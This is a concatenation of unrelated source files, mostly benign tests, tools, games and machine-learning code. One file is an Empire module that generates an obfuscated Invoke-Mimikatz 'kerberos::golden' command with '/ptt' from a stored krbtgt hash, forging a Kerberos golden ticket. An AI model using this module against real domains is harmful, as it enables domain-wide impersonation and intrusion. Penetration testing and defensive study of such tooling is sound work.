self.obj.engine.start_subprocess = lambda **kwargs: None
self.obj.startup()
self.obj.post_process()
def test_fail_on_zero_results(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_executor_requests.yml").read()))
self.obj_prepare()
self.obj.engine.prepared = [self.obj]
self.obj.engine.started = [self.obj]
prov = Local()
prov.engine = self.obj.engine
prov.executors = [self.obj]
prov.started_modules = [self.obj]
self.obj.engine.provisioning = prov
self.assertRaises(ToolError, self.obj.engine.provisioning.post_process)
def test_aremote_prov_requests(self):
self.obj.execution.merge({
"scenario": {
"requests": [
"http://blazedemo.com"]}})
resources = self.obj.resource_files()
self.assertEqual(0, len(resources))
def test_dont_copy_local_script_to_artifacts(self):
filename = "BlazeDemo.java" # ensures that .java file is not copied into artifacts-dir
script_path = RESOURCES_DIR + "" + filename
self.obj.execution.merge({
"scenario": {
"script": script_path,
}
})
files = self.obj.resource_files()
self.obj_prepare_runner()
self.assertIn(script_path, files)
artifacts_script = os.path.join(self.obj.engine.artifacts_dir, filename)
self.assertFalse(os.path.exists(artifacts_script))
def test_take_script_from_artifacts(self):
"""ensures that executor looks for script in artifacts-dir (for cloud/remote cases)"""
self.obj.engine.file_search_paths = [self.obj.engine.artifacts_dir]
script_name = "BlazeDemo.java"
test_script = RESOURCES_DIR + "" + script_name
artifacts_script = os.path.join(self.obj.engine.artifacts_dir, script_name)
shutil.copy2(test_script, artifacts_script)
self.obj.execution.merge({
"scenario": {
"script": script_name,
}
})
self.obj_prepare_runner()
def test_do_not_modify_scenario_script(self):
self.obj.execution.merge({
"scenario": {
"requests": ["address"],
}
})
self.obj_prepare()
self.assertNotIn("script", self.obj.get_scenario())
def test_default_address_gen(self):
self.obj.execution.merge({
"scenario": {
"default-address": "http://blazedemo.com",
"requests": ["/", "http://absolute.address.com/somepage", "/reserve.php"],
}
})
self.obj_prepare()
with open(os.path.join(self.obj.engine.artifacts_dir, os.path.basename(self.obj.script))) as fds:
script = fds.read()
urls = re.findall(r"\.get\('(.+)'\)", script)
self.assertEqual("http://blazedemo.com/", urls[0])
self.assertEqual("http://absolute.address.com/somepage", urls[1])
self.assertEqual("http://blazedemo.com/reserve.php", urls[2])
def test_force_runner(self):
self.obj.execution.merge({
'scenario': {'script': RESOURCES_DIR + 'selenium/junit/jar/'},
'runner': 'apiritif',
})
self.obj_prepare()
self.assertIsInstance(self.obj.runner, ApiritifNoseExecutor)
def test_additional_classpath_resource_files(self):
self.obj.execution.merge({
'scenario': {
'script': RESOURCES_DIR + 'selenium/junit/jar/dummy.jar',
'runner': 'junit',
'additional-classpath': [RESOURCES_DIR + 'selenium/junit/jar/another_dummy.jar']}})
self.obj.engine.config.merge({
'modules': {
'junit': {
'additional-classpath': [RESOURCES_DIR + 'selenium/testng/jars/testng-suite.jar']}}})
own_resources = self.obj.resource_files()
all_resources = list(set(self.obj.get_resource_files()))
# scenario.script, scenario.additional-classpath, settings.additional-classpath
self.assertEqual(len(own_resources), 2)
self.assertEqual(len(all_resources), 3)
def test_add_env_path(self):
path1 = os.path.join("foo", "bar")
path2 = os.path.join("bar", "baz")
self.obj.env.add_path({"PATH": path1})
self.obj.env.add_path({"PATH": path2})
self.assertIn(path1, self.obj.env.get("PATH"))
self.assertIn(path2, self.obj.env.get("PATH"))
def test_subscribe_to_transactions(self):
dummy = DummyListener()
self.configure({
'execution': {
"iterations": 5,
'scenario': {'script': RESOURCES_DIR + 'selenium/python/test_selenium_transactions.py'},
'executor': 'selenium'
},
})
self.obj_prepare_runner()
self.obj.subscribe_to_transactions(dummy)
try:
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
fake_out = os.path.join(RESOURCES_DIR, 'apiritif/dummy-output.out')
self.obj.runner._tailer = FileReader(filename=fake_out, parent_logger=self.log)
finally:
self.obj.shutdown()
self.obj.post_process()
self.assertEqual(10, dummy.transactions['hello there'])
class TestReportReader(BZTestCase):
def test_report_reader(self):
reader = LoadSamplesReader(RESOURCES_DIR + "selenium/report.ldjson", ROOT_LOGGER)
items = list(reader._read(last_pass=True))
self.assertEqual(4, len(items))
self.assertEqual(items[0][1], 'testFailure')
self.assertEqual(items[0][6], '400')
self.assertEqual(items[1][1], 'testBroken')
self.assertEqual(items[1][6], '500')
self.assertEqual(items[2][1], 'testSuccess')
self.assertEqual(items[2][6], '200')
self.assertEqual(items[3][1], 'testUnexp')
self.assertEqual(items[3][6], 'UNKNOWN')
def test_reader_buffering(self):
first_part = b'{"a": 1, "b": 2}\n{"a": 2,'
second_part = b'"b": 3}\n{"a": 3, "b": 4}\n'
reader = LDJSONReader("yip", ROOT_LOGGER)
buffer = BytesIO(first_part)
reader.file.fds = buffer
reader.file.fds.name = "yip"
items = list(reader.read(last_pass=False))
self.assertEqual(len(items), 1)
buffer.write(second_part)
items = list(reader.read(last_pass=False))
self.assertEqual(len(items), 2)
def test_func_reader(self):
reader = FuncSamplesReader(RESOURCES_DIR + "selenium/report.ldjson", EngineEmul(), ROOT_LOGGER)
items = list(reader.read(last_pass=True))
self.assertEqual(5, len(items))
self.assertEqual(items[0].test_case, 'testFailure')
self.assertEqual(items[0].status, "FAILED")
self.assertEqual(items[1].test_case, 'testBroken')
self.assertEqual(items[1].status, "BROKEN")
self.assertEqual(items[2].test_case, 'testSuccess')
self.assertEqual(items[2].status, "PASSED")
self.assertEqual(items[4].test_case, 'SkippedTest')
self.assertEqual(items[4].status, "SKIPPED")
|
the-stack_0_1665 | #!/usr/bin/env python3
# Copyright 2016 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""Tries to evaluate global constructors, applying their effects ahead of time.
This is an LTO-like operation, and to avoid parsing the entire tree (we might
fail to parse a massive project), we operate on the text in Python.
"""
import logging
import os
import subprocess
import sys
__scriptdir__ = os.path.dirname(os.path.abspath(__file__))
__rootdir__ = os.path.dirname(__scriptdir__)
sys.path.append(__rootdir__)
from tools import utils
js_file = sys.argv[1]
binary_file = sys.argv[2] # mem init for js, wasm binary for wasm
total_memory = int(sys.argv[3])
total_stack = int(sys.argv[4])
global_base = int(sys.argv[5])
binaryen_bin = sys.argv[6]
debug_info = int(sys.argv[7])
extra_args = sys.argv[8:]
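# Example invocation (paths and values below are purely illustrative, not from a real build):
#   python ctor_evaller.py out.js out.wasm 16777216 5242880 1024 /path/to/binaryen/bin 1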
wasm = bool(binaryen_bin)
assert global_base > 0
logger = logging.getLogger('ctor_evaller')
# helpers
def find_ctors(js):
ctors_start = js.find('__ATINIT__.push(')
if ctors_start < 0:
return (-1, -1)
ctors_end = js.find(');', ctors_start)
assert ctors_end > 0
ctors_end += 3
return (ctors_start, ctors_end)
def find_ctors_data(js, num):
ctors_start, ctors_end = find_ctors(js)
assert ctors_start > 0
ctors_text = js[ctors_start:ctors_end]
all_ctors = [ctor for ctor in ctors_text.split(' ') if ctor.endswith('()') and not ctor == 'function()' and '.' not in ctor]
all_ctors = [ctor.replace('()', '') for ctor in all_ctors]
assert all(ctor.startswith('_') for ctor in all_ctors)
all_ctors = [ctor[1:] for ctor in all_ctors]
assert len(all_ctors)
ctors = all_ctors[:num]
return ctors_start, ctors_end, all_ctors, ctors
def eval_ctors(js, wasm_file, num):
ctors_start, ctors_end, all_ctors, ctors = find_ctors_data(js, num)
cmd = [os.path.join(binaryen_bin, 'wasm-ctor-eval'), wasm_file, '-o', wasm_file, '--ctors=' + ','.join(ctors)]
cmd += extra_args
if debug_info:
cmd += ['-g']
logger.debug('wasm ctor cmd: ' + str(cmd))
try:
    err = subprocess.run(cmd, stderr=subprocess.PIPE, timeout=10, universal_newlines=True).stderr
except subprocess.TimeoutExpired:
logger.debug('ctors timed out\n')
return 0, js
num_successful = err.count('success on')
logger.debug(err)
if len(ctors) == num_successful:
new_ctors = ''
else:
elements = []
for ctor in all_ctors[num_successful:]:
elements.append('{ func: function() { %s() } }' % ctor)
new_ctors = '__ATINIT__.push(' + ', '.join(elements) + ');'
js = js[:ctors_start] + new_ctors + js[ctors_end:]
return num_successful, js
# main
def main():
js = utils.read_file(js_file)
ctors_start, ctors_end = find_ctors(js)
if ctors_start < 0:
logger.debug('ctor_evaller: no ctors')
sys.exit(0)
ctors_text = js[ctors_start:ctors_end]
if ctors_text.count('(') == 1:
logger.debug('ctor_evaller: push, but no ctors')
sys.exit(0)
num_ctors = ctors_text.count('function()')
logger.debug('ctor_evaller: %d ctors, from |%s|' % (num_ctors, ctors_text))
wasm_file = binary_file
logger.debug('ctor_evaller (wasm): trying to eval %d global constructors' % num_ctors)
num_successful, new_js = eval_ctors(js, wasm_file, num_ctors)
if num_successful == 0:
logger.debug('ctor_evaller: not successful')
sys.exit(0)
logger.debug('ctor_evaller: we managed to remove %d ctors' % num_successful)
utils.write_file(js_file, new_js)
if __name__ == '__main__':
sys.exit(main())
|
the-stack_0_1666 | import os
from ..brew_exts import (
build_env_statements,
DEFAULT_HOMEBREW_ROOT,
recipe_cellar_path,
)
from ..resolvers import Dependency, NullDependency
class UsesHomebrewMixin:
def _init_homebrew(self, **kwds):
cellar_root = kwds.get('cellar', None)
if cellar_root is None:
cellar_root = os.path.join(DEFAULT_HOMEBREW_ROOT, "Cellar")
self.cellar_root = cellar_root
    def _find_dep_versioned(self, name, version, exact=True):
recipe_path = recipe_cellar_path(self.cellar_root, name, version)
if not os.path.exists(recipe_path) or not os.path.isdir(recipe_path):
return NullDependency(version=version, name=name)
commands = build_env_statements(self.cellar_root, recipe_path, relaxed=True)
        return HomebrewDependency(commands, exact=exact)
def _find_dep_default(self, name, version):
installed_versions = self._installed_versions(name)
if not installed_versions:
return NullDependency(version=version, name=name)
# Just grab newest installed version - may make sense some day to find
# the linked version instead.
default_version = sorted(installed_versions, reverse=True)[0]
return self._find_dep_versioned(name, default_version, exact=version is None)
def _installed_versions(self, recipe):
recipe_base_path = os.path.join(self.cellar_root, recipe)
if not os.path.exists(recipe_base_path):
return []
names = os.listdir(recipe_base_path)
        return [n for n in names if os.path.isdir(os.path.join(recipe_base_path, n))]
class UsesToolDependencyDirMixin:
def _init_base_path(self, dependency_manager, **kwds):
self.base_path = os.path.abspath( kwds.get('base_path', dependency_manager.default_base_path) )
class UsesInstalledRepositoriesMixin:
def _get_installed_dependency( self, name, type, version=None, **kwds ):
installed_tool_dependencies = kwds.get("installed_tool_dependencies", [])
for installed_tool_dependency in (installed_tool_dependencies or []):
name_and_type_equal = installed_tool_dependency.name == name and installed_tool_dependency.type == type
if version:
if name_and_type_equal and installed_tool_dependency.version == version:
return installed_tool_dependency
else:
if name_and_type_equal:
return installed_tool_dependency
return None
class HomebrewDependency(Dependency):
def __init__(self, commands, exact=True):
self.commands = commands
self._exact = exact
@property
def exact(self):
return self._exact
def shell_commands(self, requirement):
raw_commands = self.commands.replace("\n", ";")
return raw_commands
def __repr__(self):
return "PlatformBrewDependency[commands=%s]" % self.commands
|
the-stack_0_1667 | """
Unit test each component in CADRE using some saved data from John's CMF implementation.
"""
import unittest
from parameterized import parameterized
import numpy as np
from openmdao.api import Problem
from CADRE.attitude import Attitude_Angular, Attitude_AngularRates, \
Attitude_Attitude, Attitude_Roll, Attitude_RotationMtx, \
Attitude_RotationMtxRates, Attitude_Sideslip, Attitude_Torque
from CADRE.battery import BatterySOC, BatteryPower, BatteryConstraints
from CADRE.comm import Comm_DataDownloaded, Comm_AntRotation, Comm_AntRotationMtx, \
Comm_BitRate, Comm_Distance, Comm_EarthsSpin, Comm_EarthsSpinMtx, Comm_GainPattern, \
Comm_GSposEarth, Comm_GSposECI, Comm_LOS, Comm_VectorAnt, Comm_VectorBody, \
Comm_VectorECI, Comm_VectorSpherical
from CADRE.orbit import Orbit_Dynamics # , Orbit_Initial
from CADRE.parameters import BsplineParameters
from CADRE.power import Power_CellVoltage, Power_SolarPower, Power_Total
from CADRE.reactionwheel import ReactionWheel_Motor, ReactionWheel_Power, \
ReactionWheel_Torque, ReactionWheel_Dynamics
from CADRE.solar import Solar_ExposedArea
from CADRE.sun import Sun_LOS, Sun_PositionBody, Sun_PositionECI, Sun_PositionSpherical
from CADRE.thermal_temperature import ThermalTemperature
from CADRE.test.util import load_validation_data
#
# component types to test
#
component_types = [
# from CADRE.attitude
Attitude_Angular, Attitude_AngularRates,
Attitude_Attitude, Attitude_Roll, Attitude_RotationMtx,
Attitude_RotationMtxRates, Attitude_Sideslip, Attitude_Torque,
# from CADRE.battery
BatterySOC, BatteryPower, BatteryConstraints,
# from CADRE.comm
Comm_DataDownloaded, Comm_AntRotation, Comm_AntRotationMtx,
Comm_BitRate, Comm_Distance, Comm_EarthsSpin, Comm_EarthsSpinMtx, Comm_GainPattern,
Comm_GSposEarth, Comm_GSposECI, Comm_LOS, Comm_VectorAnt, Comm_VectorBody,
Comm_VectorECI, Comm_VectorSpherical,
# from CADRE.orbit
Orbit_Dynamics, # Orbit_Initial was not recorded in John's pickle.
# from CADRE.parameters
BsplineParameters,
# from CADRE.power
Power_CellVoltage, Power_SolarPower, Power_Total,
# from CADRE.reactionwheel
ReactionWheel_Motor, ReactionWheel_Power,
ReactionWheel_Torque, ReactionWheel_Dynamics,
# from CADRE.solar
Solar_ExposedArea,
# from CADRE.sun
Sun_LOS, Sun_PositionBody, Sun_PositionECI, Sun_PositionSpherical,
# from CADRE.thermal_temperature
ThermalTemperature
]
#
# load saved data from John's CMF implementation.
#
n, m, h, setd = load_validation_data(idx='5')
class TestCADRE(unittest.TestCase):
@parameterized.expand([(_class.__name__, _class) for _class in component_types],
testcase_func_name=lambda f, n, p: 'test_' + p.args[0])
def test_component(self, name, comp_class):
try:
comp = comp_class(n)
except TypeError:
try:
comp = comp_class()
except TypeError:
comp = comp_class(n, 300)
self.assertTrue(isinstance(comp, comp_class),
'Could not create instance of %s' % comp_class.__name__)
prob = Problem(comp)
prob.setup()
prob.final_setup()
inputs = comp.list_inputs(out_stream=None)
outputs = comp.list_outputs(out_stream=None)
for var, meta in inputs:
if var in setd:
prob[var] = setd[var]
comp.h = h # some components need this
prob.run_model()
for var, meta in outputs:
if var in setd:
tval = setd[var]
assert(np.linalg.norm(tval - prob[var]) / np.linalg.norm(tval) < 1e-3), \
'%s: Expected\n%s\nbut got\n%s' % (var, str(tval), str(prob[var]))
if __name__ == "__main__":
unittest.main()
|
the-stack_0_1674 | from random import choice, sample
cartas = {
chr(0x1f0a1): 11,
chr(0x1f0a2): 2,
chr(0x1f0a3): 3,
chr(0x1f0a4): 4,
chr(0x1f0a5): 5,
chr(0x1f0a6): 6,
chr(0x1f0a7): 7,
chr(0x1f0a8): 8,
chr(0x1f0a9): 9,
chr(0x1f0aa): 10,
chr(0x1f0ab): 10,
chr(0x1f0ad): 10,
chr(0x1f0ae): 10,
}
for carta, valor in cartas.items():
print("la carta {} vale {}".format(carta, valor))
print("Empieza el Black Jack")
lista_cartas = list(cartas)
main_jugador = sample(lista_cartas, 2)
score_jugador = sum(cartas[carta] for carta in main_jugador)
print("Te han tocado las cartas: {} {} , y su puntuación es {}.".format(main_jugador[0],
main_jugador[1],
score_jugador))
main_banca = sample(lista_cartas, 2)
score_banca = sum(cartas[carta] for carta in main_banca)
print("La banca tiene las cartas: {} {} , y su puntuación es {}.".format(main_banca[0],
main_banca[1],
score_banca)) |
the-stack_0_1675 | import csv
import os
#import pandas as pd
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
#import scipy.stats as stats
def main():
test_dir = "length_500"
data = get_data(test_dir)
plot_aggregate_over_time(data, "schaffer", test_dir)
plot_stddev_over_time(data, "schaffer", test_dir)
plot_average_final_fitness(data, "schaffer", test_dir)
#plot_single_run_over_time(data[data.keys()[0]]["1"]["average_experienced"], test_dir)
#print data.keys()[0]
def get_data(common_dir):
data = {}
for d in os.listdir(common_dir):
if not os.path.isdir(common_dir + "/" + d):
continue
dir_name_list = d.split("/")[-1].split("_")
idnum = dir_name_list[-1]
config = "_".join(dir_name_list[:-1])
if config in data:
data[config][idnum] = {}
else:
data[config] = {}
data[config][idnum] = {}
with open(common_dir+"/"+d+"/correlation.dat") as infile:
data[config][idnum]["correlation"] = float(infile.readline())
data[config][idnum]["average_experienced"] = import_csv(common_dir+"/"+d+"/experienced_fitnesses.csv")
data[config][idnum]["average_reference"] = import_csv(common_dir+"/"+d+"/reference_fitnesses.csv")
#data[config][idnum]["best_experienced"] = import_csv(common_dir+"/"+d+"/experienced_best_fitnesses.csv")
#data[config][idnum]["best_reference"] = import_csv(common_dir+"/"+d+"/reference_best_fitnesses.csv")
return data
def import_csv(file_name):
with open(file_name, "rb") as csvfile:
csv_reader = csv.reader(csvfile)
data = []
data.append(csv_reader.next())
#print(data)
for row in csv_reader:
#print(row)
data.append([float(i) for i in row])
return data
def plot_single_run_over_time(single_run_data, directory):
    plt.clf()
plt.plot(single_run_data["Generation"], np.log(single_run_data["Average_Fitness"]))
plt.savefig(directory+"/single_run_over_time.png")
def plot_aggregate_over_time(data, key=None, directory="."):
plt.clf()
lines = {}
for config in data:
if (key != None and key not in config):
continue
series = []
for run in data[config]:
series.append([])
for i in range(1, len(data[config][run]["average_reference"])):
series[-1].append(data[config][run]["average_reference"][i][1])
averages = []
#stdevs = []
for i in range(len(series[0])):
add_factor = 0
if "rana" in config:
add_factor = 20000
logs = [np.log(s[i]+add_factor) for s in series]
averages.append(sum(logs)/float(len(logs)))
lines[config] = Line2D(data[config][data[config].keys()[0]]["average_reference"][0], averages)
x = []
for i in range(1,len(data[config][data[config].keys()[0]]["average_reference"])):
x.append(data[config][data[config].keys()[0]]["average_reference"][i][0])
plt.plot(x, averages, hold=True, label=config)
plt.legend(loc="upper right")
plt.xlabel("Generation")
plt.ylabel("Average Fitness")
#plt.figlegend([lines[l] for l in lines], [l for l in lines])
plt.savefig(directory+"/runs_over_time_"+key+"_2500gen.png")
def plot_stddev_over_time(data, key=None, directory="."):
plt.clf()
lines = {}
for config in data:
if (key != None and key not in config):
continue
series = []
for run in data[config]:
series.append([])
for i in range(1, len(data[config][run]["average_reference"])):
series[-1].append(data[config][run]["average_reference"][i][2])
averages = []
#stdevs = []
for i in range(len(series[0])):
add_factor = 0
if "rana" in config:
add_factor = 20000
devs = [s[i] for s in series]
averages.append(sum(devs)/float(len(devs)))
lines[config] = Line2D(data[config][data[config].keys()[0]]["average_reference"][0], averages)
x = []
for i in range(1,len(data[config][data[config].keys()[0]]["average_reference"])):
x.append(data[config][data[config].keys()[0]]["average_reference"][i][0])
plt.plot(x, averages, hold=True, label=config)
plt.legend(loc="upper right")
plt.xlabel("Generation")
plt.ylabel("Average Fitness")
#plt.figlegend([lines[l] for l in lines], [l for l in lines])
plt.savefig(directory+"/diversity_over_time_"+key+"_2500gen.png")
def plot_average_final_fitness(data, key=None, directory="."):
plt.clf()
corrs = []
finals = []
for config in data:
if key == None or key in config:
for run in data[config]:
corrs.append(data[config][run]["correlation"])
add_factor=0
if "rana" in config:
add_factor = 20000
finals.append(add_factor+float(data[config][run]["average_reference"][-1][1]))
#finals.append(float(data[config][run]["best_reference"]["Best_fitness"][-1:]))
plt.plot(corrs, np.log(finals), ".")
plt.xlabel("Correlation")
plt.ylabel("Average Fitness")
plt.savefig(directory+"/correlation_vs_final_fitness_scatter_"+key+".png")
if __name__ == "__main__":
main()
|
the-stack_0_1677 | # Copyright 2015 Jason Meridth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pyhole Allergies Plugin"""
import datetime
from pyhole.core import plugin
from pyhole.core import utils
class Allergies(plugin.Plugin):
"""Provide access to current allergy data."""
@plugin.hook_add_command("allergies")
@utils.spawn
def allergies(self, message, params=None, **kwargs):
"""Display current allergies in San Antonio, TX (ex: .allergies)."""
d = datetime.datetime.now()
weekend = d.isoweekday() in (6, 7)
if weekend:
message.dispatch("Unable to fetch allergy data on weekends.")
return
today = d.strftime("%Y-%m-%d")
url = "http://saallergy.info/day/%s" % today
headers = {"accept": "application/json"}
response = utils.fetch_url(url, headers=headers)
if response.status_code != 200:
return
data = response.json()
text = "Allergies for %s: " % today
for a in data["results"]:
text = text + "%s - %s (%s) | " % (a["allergen"], a["level"],
a["count"])
text = text.rstrip(" ")
text = text.rstrip("|")
message.dispatch(text)
@plugin.hook_add_command("pollen")
def alias_pollen(self, message, params=None, **kwargs):
"""Alias of allergies."""
self.allergies(message, params, **kwargs)
|
the-stack_0_1679 | """
To run the code for each problem, simply run the 'runP#.py' file.
So for this problem, run runP3.py
The P#classes.py files are very similar across problems,
but each includes a scaling which is (roughly) optimized for that specific problem.
The runP#.py file will automatically import the necessary classes from the appropriate location.
"""
import torch
import torch.nn as nn
from torch.distributions import Normal
import cv2
import numpy as np
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Memory:
def __init__(self):
self.actions = []
self.states = []
self.logprobs = []
self.rewards = []
self.is_terminals = []
def clear_memory(self):
del self.actions[:]
del self.states[:]
del self.logprobs[:]
del self.rewards[:]
del self.is_terminals[:]
class ActorCritic(nn.Module):
def __init__(self, state_dim, action_dim, n_latent_var_a1, n_latent_var_a2, n_latent_var_c1, n_latent_var_c2):
super(ActorCritic, self).__init__()
# actor
self.action_layer = nn.Sequential(
nn.Linear(state_dim, n_latent_var_a1),
nn.ReLU(),
nn.Linear(n_latent_var_a1, n_latent_var_a2),
nn.ReLU(),
nn.Linear(n_latent_var_a2, action_dim)
)
# critic
self.value_layer = nn.Sequential(
nn.Linear(state_dim, n_latent_var_c1),
nn.ReLU(),
nn.Linear(n_latent_var_c1, n_latent_var_c2),
nn.ReLU(),
nn.Linear(n_latent_var_c2, 1)
)
def forward(self):
raise NotImplementedError
def act(self, state, std_scale, memory):
state = torch.from_numpy(state).float().to(device)
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action = dist.sample()
action = 1 * action
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(dist.log_prob(action))
return action.detach().numpy()
def act_deterministic(self, state, std_scale, memory):
state = torch.from_numpy(state).float().to(device)
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action = action_probs
action = 1 * action
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(dist.log_prob(action))
return action.detach().numpy()
def evaluate(self, state, action, std_scale):
action_probs = self.action_layer(state)
dist = Normal(loc=action_probs, scale=std_scale)
action_logprobs = dist.log_prob(action)
dist_entropy = dist.entropy()
state_value = self.value_layer(state)
return action_logprobs, torch.squeeze(state_value), dist_entropy
def film_stochastic_vid(self, filepath, trial_num, random_seed, environment, max_timesteps, ppo, memory,
std_scale):
out = cv2.VideoWriter(filepath.format(trial_num, random_seed),
cv2.VideoWriter_fourcc(*'mp4v'), 30,
(640, 480))
img = environment.render()
out.write(np.array(img))
state = environment.reset()
for scene in range(max_timesteps):
action = ppo.policy_old.act(state, std_scale, memory)
next_state, reward, done, _ = environment.step(action)
img = environment.render()
out.write(np.array(img))
state = next_state
out.release()
memory.clear_memory()
def film_deterministic_vid(self, filepath, trial_num, random_seed, environment, max_timesteps, ppo, memory,
std_scale):
out = cv2.VideoWriter(filepath.format(trial_num, random_seed),
cv2.VideoWriter_fourcc(*'mp4v'), 30,
(640, 480))
img = environment.render()
out.write(np.array(img))
state = environment.reset()
for scene in range(max_timesteps):
action = ppo.policy_old.act_deterministic(state, std_scale, memory)
next_state, reward, done, _ = environment.step(action)
img = environment.render()
out.write(np.array(img))
state = next_state
out.release()
memory.clear_memory()
class PPO:
def __init__(self, environment, state_dim, action_dim, n_latent_var_a1, n_latent_var_a2, n_latent_var_c1,
n_latent_var_c2, lr, gamma, K_epochs, eps_clip, entropy_beta, critic_coef):
self.environment = environment
self.lr = lr
self.gamma = gamma
self.eps_clip = eps_clip
self.K_epochs = K_epochs
self.entropy_beta = entropy_beta
self.critic_coef = critic_coef
self.policy = ActorCritic(state_dim, action_dim,
n_latent_var_a1, n_latent_var_a2,
n_latent_var_c1, n_latent_var_c2).to(device)
self.optimizer = torch.optim.Adam(self.policy.parameters(), lr=lr)
self.policy_old = ActorCritic(state_dim, action_dim,
n_latent_var_a1, n_latent_var_a2,
n_latent_var_c1, n_latent_var_c2).to(device)
self.policy_old.load_state_dict(self.policy.state_dict())
self.MseLoss = nn.MSELoss()
def update(self, memory, std_scale):
# I found that for my implementation, using this form of the rollouts worked best
disc_reward = 0
rewards_bin = []
# We begin with the latest rewards, and work backwards
for reward, is_terminal in zip(reversed(memory.rewards), reversed(memory.is_terminals)):
if is_terminal:
disc_reward = 0
disc_reward = (disc_reward * self.gamma) + reward
# Insert backwards, since we 'reversed' above.
rewards_bin.insert(0, disc_reward)
rewards = torch.tensor(rewards_bin).to(device)
rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-5)
# Must convert lists to tensors
old_logprobs = torch.stack(memory.logprobs).to(device).detach()
old_actions = torch.stack(memory.actions).to(device).detach()
old_states = torch.stack(memory.states).to(device).detach()
# Now we optimize the policy
for _ in range(self.K_epochs):
logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions, std_scale=std_scale)
# First we find the ratio of the probabilities of selecting action a_t, given state s_t, under
# the new and old policies, respectively.
# We can use the log to make this more computationally efficient.
newold_ratio = torch.exp(logprobs - old_logprobs.detach())
# subtract of the state-values from the rewards to get the advantages
advantages = rewards - state_values.detach()
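            # This is the standard PPO clipped surrogate objective:
            #   L_CLIP = E[ min(r_t * A_t, clip(r_t, 1 - eps, 1 + eps) * A_t) ]
            # with r_t the new/old action-probability ratio and A_t the advantage.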
# Reshape this
newold_ratio = newold_ratio.view(2, -1)
target1 = newold_ratio * advantages
# In pytorch, 'clamp' is how we clip.
target2 = torch.clamp(newold_ratio, 1 - self.eps_clip, 1 + self.eps_clip)
target3 = target2 * advantages
# We need to isolate out the third term to reshape it appropriately
entropy = self.entropy_beta * dist_entropy
entropy = entropy.view(2, -1)
actor_loss = -torch.min(target1, target3)
critic_loss = self.critic_coef * self.MseLoss(state_values, rewards)
# Now we have our total loss
loss = actor_loss + critic_loss - entropy
# now perform update via gradient step
self.optimizer.zero_grad()
loss.mean().backward()
self.optimizer.step()
self.policy_old.load_state_dict(self.policy.state_dict()) |
the-stack_0_1680 | from turtle import Turtle, Screen
import time
screen = Screen()
screen.bgcolor('black')
screen.title('My Snake Game')
screen.tracer(0)
starting_positions = [(0, 0), (-20, 0), (-48, 0)]
pace = 20
segments = []
for position in starting_positions:
new_segment = Turtle("square")
new_segment.color("white")
new_segment.penup()
new_segment.goto(position)
segments.append(new_segment)
game_is_on = True
while game_is_on:
screen.update()
time.sleep(0.1)
for seg_num in range(len(segments) - 1, 0, -1):
new_x = segments[seg_num - 1].xcor()
new_y = segments[seg_num - 1].ycor()
segments[seg_num].goto(new_x, new_y)
segments[0].forward(pace)
screen.exitonclick() |
the-stack_0_1681 | from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.database.models import Credential
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# if a credential ID is specified, try to parse
cred_id = params["CredID"]
if cred_id != "":
if not main_menu.credentials.is_credential_valid(cred_id):
return handle_error_message("[!] CredID is invalid!")
cred: Credential = main_menu.credentials.get_credentials(cred_id)
if cred.username != "krbtgt":
return handle_error_message("[!] A krbtgt account must be used")
if cred.domain != "":
params["domain"] = cred.domain
if cred.sid != "":
params["sid"] = cred.sid
if cred.password != "":
params["krbtgt"] = cred.password
if params["krbtgt"] == "":
print(helpers.color("[!] krbtgt hash not specified"))
# build the golden ticket command
script_end = "Invoke-Mimikatz -Command '\"kerberos::golden"
for option,values in params.items():
if option.lower() != "agent" and option.lower() != "credid":
if values and values != '':
script_end += " /" + str(option) + ":" + str(values)
script_end += " /ptt\"'"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
|
the-stack_0_1682 | import numpy as np
import openmdao.api as om
from mphys.multipoint import Multipoint
from mphys.scenario_aerostructural import ScenarioAeroStructural
from vlm_solver.mphys_vlm import VlmBuilder
from tacs.mphys import TacsBuilder
from mphys.solver_builders.mphys_meld import MeldBuilder
from struct_dv_components import StructDvMapper, SmoothnessEvaluatorGrid, struct_comps
import tacs_setup
check_derivs = False
class Top(Multipoint):
def setup(self):
# VLM
mesh_file = 'wing_VLM.dat'
mach = 0.85
aoa0 = 2.0
aoa1 = 5.0
q_inf = 12000.
vel = 178.
nu = 3.5E-5
aero_builder = VlmBuilder(mesh_file)
aero_builder.initialize(self.comm)
